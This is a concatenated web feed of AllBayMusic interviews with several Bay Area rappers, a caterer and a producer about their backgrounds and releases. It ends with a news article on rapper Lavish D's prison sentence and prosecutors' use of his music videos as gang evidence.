<content:encoded><![CDATA[<p><strong>ABM: What is your Rap name? Tell us the story behind your hip-hop name?</strong></p>
<p><strong>Kingsman95</strong>: I go by the name of Kingsman95 also known as Yung King on previous releases . I use to go by the name Yung King because the rap group I was in we all were heavy on supreme mathematics. So we all called eachother kings and queens when greeting one another . Kingsman95 came about after some hard life choices brought me to getting locked up and finding god through a dark time . I took Kingsman classes through the Salvation Army and my birth year is 95 hence Kingsman95.</p>
<p><strong>ABM: Has anything happened in your life that led to the decision of becoming a musician?</strong></p>
<p><strong>Kingsman95</strong>: Coming from an older father who grew up in the Bay Area in the 50/60s I was raised on a whole different genre of sound then what I’m into now . But I believe The Animals , The Beatles , Carlos Santana , Stevie Nicks , Tracy Chapman . All those older artists who really had a craft for music I was heavily involved in . My dad was heavy on Woodstock and the culture behind music . My mom came to the United States with my two sisters before I was born . My first language was Spanish . So I was raised also with Los Angeles azulez playing in the background all the time and my mom dancing and singing . Both my parents are life’s of the parties so I was destined to enjoy the atmosphere.</p>
<p><strong>ABM: How did you get your start in the hip hop scene?</strong></p>
<p><strong>Kingsman95</strong>: Honestly just freestyling at parties like any other elementary kids . My buddy use to play guitar and I would play the djembe and we would play and freestyle almost with like a sublime style . And then I went to an Andre Nickatina concert at the Regency Ballroom and just fell in love with the rap scene the culture the sound . I loved everything about it . I was from a small town so coming to the city and hearing one of the dopest to do it perform it was amazing. First time opening up a big show was for We Stay Fly opening for Taj He Spitz and Da Hoodstarz in my hometown after releasing my first Mic Drop style video ( supreme mathematics ) . At the time . It was a major step for a freshman to be up on stage with his idols . Ever since a packed out show and the energy we felt that night I’ve been addicted since .</p>
<p><strong>ABM: Where are you from, and what was it like growing up there?</strong></p>
<p><strong>Kingsman95</strong>: I was born in the Bay Area August 23 1995 . Early toddler years I was in EPA . Where I honestly think a lot of my influence came from . I grew up in a small town of Sonora , Ca . So moving to a small town from EPA . I was different me and my sisters were different. We spoke a different language . We dressed different. It was all a whole new experience and it was what makes my music so dope now . I have street experiences twisted with country living . Best of both worlds . Sonora Ca is a small town in Northern Ca that is really slept on . There is amazing artists coming from that region and it’s about to be known real soon .</p>
<p><strong>ABM: What do you typically rap about?</strong></p>
<p><strong>Kingsman95</strong>: I typically rap about being a partner in life with my lady . Being a father . And just the honest experiences of life . That’s one thing . Feedback I get back at shows is every word you spoke I felt it . And that’s what I want . I want you to know that this is real life . I don’t want you questioning whether or not what I’m saying is real because everything is . I also since my early years have talked about god and spiritual experiences. Just have always been very spiritual due to the roots my mom have passed on.</p>
<p><strong>ABM: What are your last full length releases people can go check out right now?</strong></p>
<p><strong>Kingsman95</strong>: I have a full solo album Thoughts In My Ashtray out now on all streaming platforms . Also the latest release that is out on YouTube is the Hallelujah &#8211; Kingsman95 ft J Bugz . Shot and Filmed by $aul¢y  . Also just posted A feature called So Real &#8211;  Afroman ft B Fresh of Block Movement. Available in all stores as well.</p>
<p><strong>ABM: What are you currently working on?</strong></p>
<p><strong>Kingsman95</strong>: Currently working on dropping single ( Progress ) May 24 ft Shill Macc with a visual dropping shortly after . Also a visual with my big brother ChiefDebo owner of the Rare Vibes Only clothing line. Called Story For My Brothers. Stay tuned all 2024 I’m dropping!</p>
<p><strong>ABM: Whats your last visual release people can check out, tell us about it.</strong></p>
<p><strong>Kingsman95</strong>: My latest visual is Die For You a mic drop visual from a single off the Thoughts In My Ashtray album . As talked about before I talk about being a partner in life and explaining to my partner I would really die for you. As being a protector and a man you have to be willing to fight and die for your family and as a man I am ready for that.</p>
<p><iframe title="Die For You - Kingsman95 aka Yung King ( Exclusive Music Video )" width="800" height="450" src="https://www.youtube.com/embed/zPTy5aQUHIk?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p><strong>ABM: What is your ultimate goal at the end of your career?</strong></p>
<p><strong>Kingsman95</strong>: My ultimate goal is to honestly just make enough money with this music that can keep me involved because I love music . Whether it’s mixing , filming , performing I love every aspect . I make music for the emotional release so I’ll always make music but if I could make money comfortably and be just enjoying the time making music . What can beat that ?</p>
<p><strong>ABM: How can people reach you?</strong></p>
<p><strong>Kingsman95</strong>: Norton Terzich on FB , IG @OFFICIALKINGSMAN95. Search me on Apple / ITunes &#8211; Kingsman95 &#8211; Spotify &#8211; Yung King &#8211; Kingsman95</p>

<content:encoded><![CDATA[<p>ABM: What is your Company name? How did you come up with it?</p>
<p>Vics Bay Area Catering: We&#8217;ll my name is Vic lol and I came up with name because I&#8217;m proud to be from the Bay Area &amp; I had to incorporate the Bay some how to show that I dont just cater in a specific city or location.</p>
<p>ABM: How did you get started in the catering business? What made you wanna be a chef?</p>
<p>Vics Bay Area Catering: My grandpa opened up a Mexican Restaurant back in 1967 in Oakland, named Jalisco. That was my first job from when I was in the 6th grade to my senior year in high School. I wanted to become a chef after watching my uncle Tony over the years run the family business and since then I was very interested in the food industry.</p>
<p>ABM: Where are you from, and what was it like growing up there?</p>
<p>Vics Bay Area Catering: I&#8217;m born and raised in San Leandro CA, which is part of the East Bay. Growing up here was dope! I wouldnt want to live anywhere else. The bay area is diverse, we have our own slang &amp; style in music. I grew up listening to E-40, Too Short &amp; Mac Dre and going to the side shows. &#8220;The Bay has got me crazy &amp; I love the way it raised me &#8220;- Mac Dre</p>
<p>ABM: How / where did you learn how to cook?</p>
<p>Vics Bay Area Catering: My older brother is a chef &amp; when I was younger I&#8217;d tag along with him to cook for parties. He taught me alot &amp; I even followed him to go work in Miami at a resort. That was my first real job starting as a cafeteria cook then I worked my way up since then.</p>
<p>ABM: What are your plans? Do you plan to open up a truck or brick and mortar store?</p>
<p>Vics Bay Area Catering: My plan is to continue on expanding my catering services for everyone to try and to hopefully one day own a chain of food trucks or own my own restaurant.</p>
<p>ABM: What is your biggest inspiration for what you do?</p>
<p>Vics Bay Area Catering: To me its plain and simple. My inspiration are my clients. I just like making people happy while they enjoying eating my food. It pushes me to be more creative and inspired, I just want my clients to enjoy there party &amp; time with there family, while I do the rest.</p>
<p>ABM: Are there any chefs out there that inspire you?</p>
<p>Vics Bay Area Catering: I have two chefs that I&#8217;m inspire by &amp; there both related to me. My brother Andres &amp; my uncle Tony. I&#8217;v learned so much from them over the years, they have been great teachers to me as I continue to grow.</p>
<p>ABM: What is your specialty dish? What type of food do you mainly serve?</p>
<p>Vics Bay Area Catering: Man, that&#8217;s a tough one. If I had to chose my specialty dish. I would have to say my 8hr Slow cooked BBQ Pulled pork sliders or My &#8220;Famous wings&#8221; that my family never gets tired of eating. I Mainly serve Mexican food, BBQ &amp; and a little bit of everything.</p>
<p>ABM: Is it tough starting a small business? What are some of the things you had to deal with being a start up?</p>
<p>Vics Bay Area Catering: Yes! It is definitely tough to start a business. You literally have to start from the bottom, from buying all your own equipment, creating your logo and practicing menus/dishes. One thing that I had to deal with being a start up was getting recognized and building a following.</p>

<p>NDawson: My name started off as NDND, it stood for “Never doubt Nehemiah Dawson”, someone was always throwing shade my way growing up as a kid, so a family member by the name of Hustle Man Benjamin gave me the name. Later down the line my homeboy Preston out of Seattle Washington said N Dawson out the blue one day, w and I ran with it.</p>
<p>ABM: Has anything happened in your life that led to the decision of becoming a musician?</p>
<p>NDawson: When I stated hanging out in the streets, my mom ask me what could she do to keep me in the house, most of my friends where gang banging and robbing, so she refinanced her house and got me my first piece of music equipment, I was 12.  I really just tried to work with every rapper i could find, but never worked out till years later.</p>
<p>ABM: Where are you from, and what was it like growing up there?</p>
<p>NDawson: I&#8217;m from sac town it was crazy growing up on 29st most of the time it was heavy drugs and trap houses every where. Having access to drugs and guns was unbelievable, not to positive, but I stayed out the way. I grew up in Sacramento California during the time when we had  the most  murder rate due to all the gang violence with the Crips and the Bloods and other gangs. Not to mention we had a chop shop across the street things were really fast growing up.</p>
<p>ABM: Has anything happened in your life that led to the decision of becoming a musician?</p>
<p>NDawson: I wanted to make beats, blood bank AKA Burbank High School, even school was unsafe, homicides going on, the gang unit at school, Crips and Bloods. Meadowview at this time all the Bloods from Meadowview was going to school with all the Crips from 29th and 24th street, they should have known better.</p>
<p>ABM: What kind of music do you make?</p>
<p>NDawson: I normally make the type of beats currently how I feel at the moment, I am standing right next to Kanye West, his words and music isn&#8217;tmath it&#8217;s emotions.</p>
<p>ABM: What are your last full length releases people can go check out right now?</p>
<p>NDawson: My last release was Turk and Birdman&#8217;s new single &#8220;All The Money&#8221;, produced by me and my team lildutty and Phvntom808.<br />
<iframe src="https://www.youtube.com/embed/WRnRLY2UfaQ" width="560" height="315" frameborder="0" allowfullscreen="allowfullscreen"></iframe></p>

<content:encoded><![CDATA[<p>ABM: What is your Rap name? Tell us the story behind your hip-hop name?</p>
<p>Oni Montana: Oni Montana and Oni The One &amp; Only, I have two names because I have 2 personalities as a rapper. Oni Montana is my rap name, when I’m spitting real bars and talkin that shit. My uncle KT The Boss actually gave me that name around the time Future came out with “Tony Montana” So I jus ran with it. I use the Tony Montana thang in reference to the dope music I make because ima “Dope rhyme dealer” like Mac Dre use to say. While Oni The One &amp; Only is when I’m singing and harmonizing with the auto tune on my R&amp;P shit not R&amp;B lol basically for the women/Bitchs because there is a difference.</p>
<p>ABM: Has anything happened in your life that led to the decision of becoming a musician?</p>
<p>Oni Montana: I had this same vision in my head ever since middle school that I would be a rapper. I always knew it was apart of my plan. I actually was selling and recording my own mixtapes In middle school, recording off my nighas dads turntables in a garage rappin off of instrumentals. I use to rap battle kids in the school house and I always turned heads and surprised people when I opened my mouth because growing up I was hella quiet but not when it was my turn to rap. I always knew this is what I wanted to do. But back in 2008 when my older brother died I told myself I would make it for him because he was one of my number one fans and he really believed in me when it came to music so I made a promise to myself and him that ima stick to this music no matter what. I’m determined to make it it’s Destiny for me.</p>
<p>ABM: How did you get your start in the hip hop scene?</p>
<p>Oni Montana: Been rappin since middle school like I said. Selling my mixtapes and hella shit at the school house burning it off the homies computer. But I got influenced at a very early age because of all the musical talent in my family. My uncles was the Booya Tribe so they one of my many inspirations and one of the true pioneers of West Coast Hip Hop and Polynesian artists. Growing up seeing them just made me believe I could do it. First real studio I went to was with my uncle R Cade and uncle H mob of Uce Duce. I use to ride around with them while they would bust they moves and pick up they CDs basically jus soaking up game about the independent rap game that was going on in the Bay Area. In high school my uncle Swann FREE UNKS by the way, use to come pick me up from my papa house in West Pittsburg and take me to SwampKats studio in Concord and I jus sit down and soak up more game. Fast forward to 2015 my cousin Stone P got released out of prison and we been pushing this Thizz Island shit ever since. Got the blessing from the cuddie and we just been rocking really tryna push this movement and put on for our people S/O my nigha Diggs by the way</p>
<p>ABM: Where are you from, and what was it like growing up there?</p>
<p>Oni Montana: I’m from Pittsburg California in the east bay. I’m from a small town but we not small minded. I feel like we was different from other places we have our own way we talk, how we carry ourselves, the way we dress. We was saying BRO and use to get made fun of for it now look everybody says it now lol so basically we trend setters and way ahead of our time. We jus fly and peezy and got a whole bunch of game about us. It’s a lot of crime and poverty in my city but I’m hoping to change that and bring something positive back to my city and it will all start with the music . We real family oriented everybody know each other so although it’s a lot of hate it’s a lot of love too but they say life is all about balance. One thing about my city is growing up we had a huge music scene it was litt we had the Ghetto Stars, Mob Figaz, and A-wax. I use to see signs full of stickers with my favorite rappers on it. My cousin Noah and Tau put me on all the new music so I just had a sense of pride being from Pittsburg, especially with all the dope music that came from my city. So I just knew one day I was gonna be one of them nighas when I got older.</p>
<p>ABM: What do you typically rap about?</p>
<p>Oni Montana: Anything that’s on my mind when I hear the beat. I make mood music, so however I feel at the time is what I’m finna rap about. I try to express myself as much as possible thru my music and I’ll hit every subject because your emotions are subject to change. So I feel I’m very versatile when it’s come to my songs because of all the different feelings, emotions, pain and happiness, all that I have endured in life is all a reflection of my music. I like to harmonize and fuck with the auto tune but I also got real life bars and I actually know how to rap like The Jacka said whatever happen to coming dope? That’s all I’m tryna do is push this dope music and bring some pride back in this rap shit. Word to the Jack.</p>
<p>ABM: What are your last full length releases people can go check out right now?</p>
<p>Oni Montana: I got the <a href="https://mobile.datpiff.com/mixtape/780100">Oral Sex Mixtape hosted by J Diggs</a>. The meaning behind the name of the tape is I’m basically making love to the music orally lol But than I got a tape with my cousin Quad High out the city Called “Plugged in” also I jus recently dropped a new single “No Where” produced by High Volume out of Ohio. I gotta bunch of shit coming tho so stay tuned . We really pushing this Thizz Island and #FlyUcen movement tryna put on for all the polys.</p>
<p>ABM: What are you currently working on?</p>
<p>Oni Montana: Workin on the Polynesian Prince Album that’s coming real soon. And after that I plan on dropping a EP with my producer High Volume. Me and my lil cousin Samoan Joe gotta project in the works, he out of Pittsburg Cali too. He dope, make sure y’all check him out. I gotta few tracks with ScottieNoPippen one of the most slept on artist out the bay but we def gon turn it up on they ass once they hear this new shit, and I got a island reggae single coming out just in time for summer with my USO Flex that thang going crazy. I ain’t gon lie so I got hella shit in the works, plus a bunch of visuals I’m finna drop. My plan is to just really stay in y’all face this year. <p><b>ABM: </b>What is your Rap name? Tell us the story behind your hip-hop name?</p>
<p><strong>Nanda:</strong> Nanda, its short for my real name, Dananda.</p>
<p><b>ABM: </b>Has anything happened in your life that led to the decision of becoming a musician?</p>
<p><strong>Nanda: </strong>I&#8217;ve been rapping since I was a youngin but It was always just with the homies, then senior year i got in a car accident hella faded and wrecked my whip and after that I was kind of stuck at the house. Since I was on probation and didn&#8217;t have shit else to do cuz i couldn&#8217;t drive no where I just started really grinding. That car accident was one of the best and worst things that&#8217;s ever happened to me man. It made me re-evaluate the whole way i&#8217;d been living up until then and really say fuck the bullshit and just focus on this music.</p>
<p><b>ABM: </b>How did you get your start in the hip hop scene?</p>
<p><strong>Nanda: </strong>I guess just the people i was around really, i was always looking up to the older cats who had bars when i was hella young. I probably did my first record when I was like 11 with this older cat I used to roll with, Mac Marsh, and my other partner Niko and it was trash just because i had that high ass voice when i was little but i did say some a couple lines that i still might say if we freestyle or something on it like &#8220;I be buzzing like a bee off that hennessy&#8221; haha but yeah I just always been around hip hop just through the people i associate myself with.</p>
<p><b>ABM: </b>How did you get your start in producing?</p>
<p><strong>Nanda: </strong>I got a close friend who&#8217;s a producer, Fua_Yabishh, who put me on to FL Studios and showed me how to use it basically and then i just kept putting in time on my own on youtube and shit, gaining more and more knowledge about it. I fuck with other programs now too like Abelton, Logic and ProTools but FL is still my favorite just because its what I&#8217;m used to. And my homies fuck with it hella tough so we all learn off each other, it creates a dope environment when we all in the studio together.</p>
<p><b>ABM: </b>Where are you from, and what was it like growing up there?</p>
<p><strong>Nanda: </strong> I was born in Santa Rosa and grew up in Lake County which is like an hour north of the bay. Growing there was kinda crazy because I was a youning getting into to hella shit and its a little ass community so every one in the town hear every little thing about you. I went to a charter school for elementary then transferred to middletown for middle school?highschool. The first time I got on probation was I 13 years old so everyone had they little idea about me for most of middle school/high school career just off some judgmental type shit. They aint even know me. Don&#8217;t get me wrong, lake county hella nice like as a place to live, but the environment caused by the drugs and poverty in the area just makes it really easy to get into trouble.</p>
<p><b>ABM: </b>What do you typically rap about?</p>
<p><strong>Nanda: </strong>I don&#8217;t stick to one topic. I just listen to the beat most of the time and it&#8217;ll make me feel some way emotionally or think of something that I can go off and make a record about. But I also like to collaborate so if another artists has an idea for a song or beat or the hook or something ill always hear them out and just vibe off what they saying in the song.</p>
<p><b>ABM: </b>What are your last full length releases people can go check out right now?</p>
<p><strong>Nanda: </strong>The last I put out is called called &#8220;Centerfolds&#8221; that was inspired by the strip club in SF. The Hook and first Verse in sung by Shane Healy and the beat was produced by Fua_Yabishh another Bay Area Hip Hop producer.</p>
<p><iframe src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/296763979&amp;color=ff5500&amp;auto_play=false&amp;hide_related=false&amp;show_comments=true&amp;show_user=true&amp;show_reposts=false" width="100%" height="166" frameborder="no" scrolling="no"></iframe></p>
<p><b>ABM: </b>What are you currently working on?</p>
<p><strong>Nanda: </strong>Im  mostly focused on my mixtape for 2017 right now.  But I have several singles in the vault   and am also finishing up another mixtape with Shane Healy and getting prepared for a small tour in the near future.</p>
<p><b>ABM: </b>What is your ultimate goal at the end of your career?</p>
<p><strong>Nanda: </strong>Shit man. Just being able to pay my bills off music would be a blessing, living off the fruits of my labor I guess, you know what i mean?</p>
<p><b>ABM: </b>Who is the most impactful artist in your life who has inspired you and why?</p>
<p><strong>Nanda: </strong>Damn if I had to pick one? I gotta keep it real and say Mac Dre because i got so much love for what he pioneered like on my momma i love hip hop as a genre period. That Hyphy shit will forever be the dopest era for music in the bay area to me. I could be eighty years old with a broken back and you put on &#8220;Feeling Myself&#8221; or &#8220;Thizzle Dance&#8221; or any of them classics you already know I&#8217;m gonna go stupid one time. But the Jacka really influenced my style too with the  Mob Music sound and all those ones I love like &#8220;Cuz I&#8217;m The Mack&#8221; and &#8220;Calling My Name&#8221; &#8230;Shit mane R.I.P Dre R.I.P Jacka. Wish they was still here.</p>
<div class="adL">
<p><b>ABM: </b>Any shout outs?</p>
<p><strong>Nanda: </strong>Shout out to everyone that supports me doing this music shit instead of having to hustle and be in all that bullshit man. Shout out to my Mom for always supporting me through everything even when the cops showed up to her door. Shout Out to my Producers Fua_Yabishh and Bwellz, mane shout out to my team, Lifted Dreams.</p>

										<content:encoded><![CDATA[<p>Interview with P.I. from 6Filthy Entertainment<br />
ABM: Where are you from?</p>
<p>P.I.:  Born and raised in the peninsula , Redwood City is where I&#8217;m from. McEvoy &amp; Madrone are the streets that raised me. My pops died when I was a kid so I was exposed to negative influences at young age. Most of the guys in my neighborhood were a real impact on how I got my style and game from so without them I would be just a regular Mexican dude lol.. I currently stay in North Fair Oaks District it&#8217;s an unincorporated part of Redwood City.. &#8220;Six Filthy&#8221; ! S/O out to my people from Little Compton to Little Mex, NFOD, Vera , East Side and to all my rich folks in the hills. Growing up in Redwood City really gave me a different perspective on life especially with the diverse lifestyles of diffrent ethincitys.</p>
<p>What&#8217;s the most recent single you released?</p>
<p>Well to be honest with you I never really officially worked on a original single, other then solos I have that can be heard on the Six Filthy Basement Musik Mixtape Vol.1 which was just recently released, majority of the songs are from tracks we did in 2012-13. &#8220;My Shit Slap&#8221; &amp; &#8220;Killuminati&#8221; are the ones I did solo. Im currently in the process of finalizing a project that I been working on since 2014. But my 6Filthy squad and I just finished wrapping up &#8220;Six Filthy City Limit The Mixtape Vol.2&#8221; it has 18 pure slaps with features on there such as; Haji Springer, Bear Faced Ent, Zak1 and more. It&#8217;s all real authentic music, there&#8217;s a alot cats in Redwood City that put out Mixtapes and Music Videos but honestly don&#8217;t have the talent nor the street credibility and real life depth in their music. 6Filthy Entertainment provides all of that so stay on the look for the latest track we are working thanks to Belushi, he linked up with Sean T and we have an exclusive song with Dubee from Thizz Ent. recorded directly out the Feds. So stay tuned for that track !!</p>
<p>ABM: What inspires you musically?</p>
<p>P.I.: I think it&#8217;s who inspires me musically, I love all types of diffrent genres and i respect the fundamentals of actually recording a song. There has been many musicians and artists who have inspired me to throughout the years. Jimmy Hendrix, 2pac, John Lennon, Nas, Nirvana, Barrington Levy I could go on forever. Real music Is made from the heart and when one has been through so many life changing experiences you tend to vent that out in music. So that initially is a major factor in my inspiration of music. Authenticity, being real.</p>
<p>ABM: How long have you been making music?</p>
<p>P.I.:  Ooooooooouuweii it&#8217;s been a while, when I was young I looked up to my close friend D.A. West &amp; Jon Andino ( J-Dash ). D.A. was one of my best friends we had several classes together and we would always mess around free styling just being fools in class. So that began In middle school as i entered high school my folks J-Dash was in this group called Red Light Records and i always wanted to be a part of it but never did. The first song I ever recorded was with D.A. &amp; J-Dash in Moutain View when I was 18. Since then I worked on my rhymes and not until after HS I met a friend that really opened my eyes and was like a mentor to me and really taught me alot about music. S/O to Zak1 from Double H Ent, when MySpace Music was trending I would always just record music and upload it with out actually doing something productive with it. My first feature was with Turf Talk from Sick Wid it Records and that was a huge milestone for me. I totally did this music thing backwards I have more experience performing then I do distributing my own music. I&#8217;ve opened up for numerous artists such as Andre Nickatina, J-Stalin, Roach Gigz, Dem Hoodstarz, Mac Mall, Mistah Fab, Kafani, D-Lo, Philthy Rich and even had a chance to open up for French Montana. So overall it&#8217;s been 10 years but I just started taking it serious since 2012 when i linked up with Rudeboi &amp; Belushi to be a part of 6Filthy.</p>
<p>7. What&#8217;s your favorite producer?</p>
<p>P.I.: Well I have a few to name, but locally I would have to say The Mekanixs from Oakland those 2 guys are one of my favorites, Traxamillion from SJ &amp; King Cydal from Menlo Park. As far a mainstream producer i would say Pharell and Dr.Dre</p>
<p>ABM: Who do you want to work with in the future?</p>
<p>P.I.:  Andre Nickatina and Roach Gigz are too artists that I would definitely enjoy working with.</p>
<p>ABM: Where can we hear your music?</p>
<p>P.I.: YouTube.com/sixfilthyent &amp; Soundcloud.com/sixfilthyentertainment and make sure you go on iTunes and purchase this hot track I recently recorded with Jon Dolla from East Palo Alto (&#8220;Own That&#8221; Ft. P.I. ) produced by Fre$ko . Go on our YouTube link and check out my 6Filthy Fam LuR&#8217;s 2 Projects &#8220;10yrs and Gunin&#8221; &amp; &#8220;Living Under The Radar&#8221; with features such as J-Stalin, HD, and more.</p>
<p>Where can we follow you?</p>
<p>Follow me on Instagram: @sixfilthyent</p>
<p>ABM: Any last words?</p>
<p>P.I.: Special thanks to the AllBayMusic Team for putting all this together and much love to all our 6Filthy supporters and fans who actually listen to our music. S/O to my Krookit Fam and HeadHonchoz and the 6FilthyMobMusik squad Belushi, Rudeboi, Coop, Marley, Gangsta Gum aka B.L.Gum, LuR and 6Figgaz.</p>

<content:encoded><![CDATA[<p>The music career of Donald “Lavish D” Oliver was rocked by a different kind of beat on June 26—the kind a gavel makes when it punctuates a six-year prison sentence.</p>
<p>That’s how long the rapper will disappear for after pleading no contest to gun and assault crimes that were said to benefit the reputation of the Starz, a notorious street gang that germinated in a local housing project in the late 1990s.</p>
<p>In prosecuting Oliver and his co-defendants, the Sacramento County District Attorney’s Office consolidated two cases: In the first, Oliver was a passenger in a car where police found a handgun in November 2013. In the second, less than four months later, Oliver filmed the assault of a gang member inside of a mall and uploaded the video to social media, where he’d also posted dozens of his rap videos.</p>
<p>Prosecutors used these music videos, portraying groups of young black men and chronicling tales of street violence, to identify members of the gang and characterize Oliver as their leader. Videos like “King of the City” and “My Niggas Do,” where a boastful Lavish ridicules his enemies and refers to his “boss status.”</p>
<p>“That was a bad video for us,” acknowledged Isaac W. Choy Jr., the defense attorney who represented Oliver during his sentencing phase. If the matter had gone to trial, Choy said he would have tried to prevent the videos from being introduced into evidence. “Whether we would have been successful or not, I don’t know,” he said.</p>
<p>It’s not a new story: A rapper is accused of living out his rhymes with too much fidelity and pays the price. Sometimes the results make sense, like when X-Raided was tried in 1992 for a home invasion that resulted in a Meadowview woman’s death. And sometimes they don’t, like the FBI’s decree that fans of Insane Clown Posse constitute a criminal street gang. But the phenomenon is unique to hip-hop, pointed out Coop D’Vill, a podcast host on The Siccness website and one of the few people to interview Lavish D.</p>
<p>After all, Frank Sinatra never had to contend with tougher sentences because of gang enhancements.</p>
<p>“That’s the penal code that they set up for us,” D’Vill said of the rap community. “A lot of stuff, to me, within the law is crazy. Lock somebody up for what they did.”</p>
<p>Like Sinatra, the 30-year-old Lavish D is no model citizen, with priors for possession of an assault weapon and marijuana for sale. Still, he never threw a punch. He didn’t fire a bullet. Yet he caught more time than those who did.</p>
<p>And it was the music that stamped his fate.</p>
<p>“That was huge,” said Alin Cintean, a defense attorney who represented one of Oliver’s co-defendants, Donte Edwards “Tizzle” Young. “The DA’s office turned over so many YouTube videos and CDs and music” during the discovery phase.</p>
<p>In an evolving music landscape, where an artist’s career depends on his social-media output, the music carries real weight. In Oliver’s case, six years of it.</p>
<p>To Officer Michael Rinehart of the Sacramento Police Department, Oliver was just another suspect trying to evade arrest.</p>
<p>On a November 2013 afternoon, Rinehart responded to Evergreen Shopping Plaza in south Sacramento to back up officers who had detained several subjects in the parking lot. Officers told him they stopped the group because its members were dressed in red and displaying hand gestures while one recorded the poses on a cellphone. When officers first approached, they said, Oliver quickly entered the liquor store, ignoring their commands to stop. But Oliver eventually was seated on the curb like the rest.</p>
<p>According to court transcripts from an October 2014 preliminary hearing, Rinehart recalled that he was putting one subject in the back of a squad car when he heard a female officer’s voice say “stop.” He turned to see Oliver running.</p>
<p>Rinehart gave chase, calling out to Oliver, who dashed into the intersection of Mack Road and Center Parkway, then east toward Providence Place Apartments. Entering the complex, Oliver fell, got back up, then tripped over a raised curb, allowing Rinehart to get close enough to wrap him up from behind. Oliver continued to struggle until another officer arrived to help put him in handcuffs. Inside his pocket, officers found a small amount of marijuana.</p>
<p>Word came over Rinehart’s radio that a search of the car proved fruitful. In the rear pouch cushion of the driver’s seat, officers discovered a Norinco 9 mm handgun with a round in the chamber and seven in the clip.</p>
<p>Prosecutors portrayed Oliver’s attempted escape as proof he knew about the gun. Oliver’s pretrial attorney, Donald Masuda, said he ran because of 3 grams of weed in his pocket and because of an outstanding misdemeanor warrant.</p>
<p>Masuda also pointed out that video surveillance from the shopping center revealed Oliver to be seated behind the front passenger seat when the car slid into its space. Co-defendant Young sat in the seat closest to where the gun was hidden, though both men exited on Young’s side. Masuda also contended that the car was registered to someone who was in the armed services, and driven by at least two other people, implying any one of them could have stuffed the gun behind the driver’s seat.</p>
<p>In response to a question from Masuda, Rinehart confirmed that Oliver never wavered from his stance that he knew nothing about the gun.</p>
<p>Then the defense attorney came to his real point. “And in between all those denials, he said that he’s a rapper, right?” Masuda asked.</p>
<p>“Yes,” Rinehart said.</p>
<p>To understand the role Lavish D’s music played in his prosecution, consider the testimony of Detective Joseph Ellis, a gang expert with the Sacramento Police Department.</p>
<p>On the witness stand last October, Ellis cited police reports and jail classification notes that speculated Oliver’s leadership status within the Starz, as well as tattoos and photos of Oliver displaying gang signs. But above all else, there was the December 2012 song, “My Niggas Do.”</p>
<p>It’s a typical Lavish D track in many ways, with bare-bones production and the rapper’s slow-flow taunts: “I ain’t gotta fight ’cuz my niggas do. I ain’t gotta ride ’cuz my niggas do. I ain’t gotta move ’cuz my niggas do. And I ain’t gotta shoot ’cuz my niggas do.”</p>
<p>It’s what Lavish refers to in the song’s intro as “boss status.” And it was enough for Ellis. “He’s saying: ’I’m the boss. I don’t have to do all these things. I have people to do them for me,’” the detective testified.</p>
<p>Things like beating up on Billy Dee Smith.</p>
<p>Smith, a validated member of the Oak Park Bloods, was returning shoes last March inside of Arden Fair mall on the day he got jumped. His crew had been quarreling with the Starz for months, both in the streets and online. Ellis testified that, a few days prior to Smith’s mall visit, a video by Bay Area rapper Philthy Rich insinuated “that members of the Oak Park Bloods were responsible for the homicides of two different Starz gang members.”</p>
<p>It’s what Ellis believes prompted five or six Starz members to ambush Smith in the Foot Action shoe store. The group had arrived from a nearby park, where they attended an annual memorial for a fellow Starz member who had been killed by a rival gang member, testimony shows. They came to the mall so Oliver could pick up a birthday present for his son. That’s when the group spotted Smith.</p>
<p>By all accounts, it was a clumsy beat-down, with surveillance video showing multiple guys lunging at Smith and mostly hitting walls or themselves. But they do pull Smith down at one point and get in a handful of glancing blows before security guards quickly break it up and the ruffians scatter. Not participating was Oliver, who filmed the scrum on his phone. In the shaky footage, he can be overheard giggling and muttering “get that nigga,” though it’s unclear whether the combatants could hear him, Ellis admitted. Oliver later posted the recording to social media under a title that made it clear he was responding directly to Philthy’s video.</p>
<p>Later that night, there was a shooting that authorities believe was its own rebuttal.</p>
<p>Oliver fled town and was later arrested in another state, and brought back to Sacramento.</p>
<p>Masuda argued the string of events wasn’t enough to implicate his client as anything more than a jerk. “He’s only thrown in under the theory that he’s the leader of a gang and he’s instigating this fight or encouraging it,” Masuda said in court. “But it’s clear that … filming fights on their phones is common practice. … Now, he was dumb enough to put it on the Internet and label it and so forth. But the bottom line is … he had nothing to do with the fight.”</p>
<p>Oliver’s sentencing attorney, Choy, was less demonstrative about that fact. He told SN&amp;R that the DA’s offer of six years to Oliver was low enough to be an acceptable resolution. Co-defendants Anthony Wayne Jacob, Efrem “Scarface” Wandick and Young, who were more hands-on in their involvement, accepted plea agreements that resulted in significantly less prison time, between 16 months and 32 months.</p>
<p>A week before speaking with SN&amp;R, D’Vill conducted a half-hour phone interview with Oliver, who touched on his recent tribulations. But mostly they talked about music.</p>
<p>“I know of Lavish D through music, not because of street rumors or gangster fairy tales,” D’Vill said. “My honest opinion is that he’s a rapper first.”</p>
<p>And a prolific one, at that.</p>
<p>Oliver had recorded an album’s worth of songs before he went away, and was submitting an original track to a compilation D’Vill is arranging.</p>
<p>Asked for his take on Lavish’s music prospects, D’Vill said the rapper was building the required buzz to be known outside of Sacramento. “Lavish was on his way up. It just so happened that the street life got involved,” he said. “I don’t think he realized the impact that he had while he was out, but he realizes it now.”</p>
<p>When they got to the end of their time, D’Vill asked whether Oliver had a message for the young boys and men who emulated him. Yeah, Oliver said: Get your money, but avoid the drama. “He’s definitely a different dude,” D’Vill said. “He was not acting like he was still the king of Sacramento.”</p>
